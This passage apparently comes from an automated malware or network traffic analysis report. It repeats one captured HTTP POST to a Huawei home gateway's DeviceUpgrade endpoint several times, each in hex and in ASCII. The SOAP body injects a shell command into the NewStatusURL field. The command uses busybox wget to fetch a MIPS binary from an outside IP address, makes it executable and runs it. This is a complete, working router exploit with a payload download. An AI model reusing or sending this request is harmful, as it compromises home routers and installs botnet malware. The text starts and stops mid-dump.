79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 